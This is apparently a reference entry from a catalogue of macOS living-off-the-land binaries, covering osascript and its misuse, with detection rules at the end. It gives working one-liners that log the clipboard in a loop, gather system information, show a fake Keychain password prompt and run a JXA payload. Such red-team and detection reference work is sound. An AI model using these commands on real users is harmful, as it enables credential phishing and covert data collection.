osascript #

Created by Cedric Owens (@cedowens)

Description ##

The osascript binary is a command-line utility included in macOS that allows users to run AppleScript and Open Scripting Architecture (OSA) scripts or commands. AppleScript is a scripting language that is designed for power users to automate various tasks, application actions, and to interact with the operating system.

Paths ##

• /usr/bin/osascript

Use Cases ##

Use the osascript binary to gather sensitive clipboard data ##

A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e ‘return (the clipboard)’ indefinitely every 10 seconds and writes clipboard content to a text file.

while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done

Use the osascript binary to gather system information ##

osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.

osascript -e 'return (system info)'

Use the osascript binary to prompt the user for credentials ##

osascript can be used to generate a dialogue box and request the user to enter the keychain password.

osascript -e 'set popup to display dialog "Keychain Access wants to use the login keychain" & return & return & "Please enter the keychain password" & return default answer "" with icon file "System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns" with title "Authentication Needed" with hidden answer'

Use the osascript binary to execute a JXA (JavaScript for Automation) file. ##

JXA is often used by red teams (and potentially attackers) as a macOS payload, as JXA is native to macOS and can access various internal macOS APIs (such as Cocoa, Foundation, OSAKit, etc.). The osascript binary can be used to execute JXA payloads by simply running “osascript [file.js]” but some malware or offensive tools may also use “osascript -l JavaScript [file.js]”.

echo "ObjC.import('Cocoa');\nObjC.import('stdlib');\nvar currentApp = Application.currentApplication();\ncurrentApp.includeStandardAdditions = true;\ncurrentApp.doShellScript('open -a Calculator.app');" > calc.js && osascript -l JavaScript calc.js

Detections ##

• Command Line Argument Detection (args contain osascript AND -e AND clipboard)

• Jamf Protect: Detect activity that is related to osascript gathering clipboard content

• Jamf Protect: Detect activity that is related to osascript pulling system information

• Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input

Resources ##

• Using macOS Internals for Post Exploitation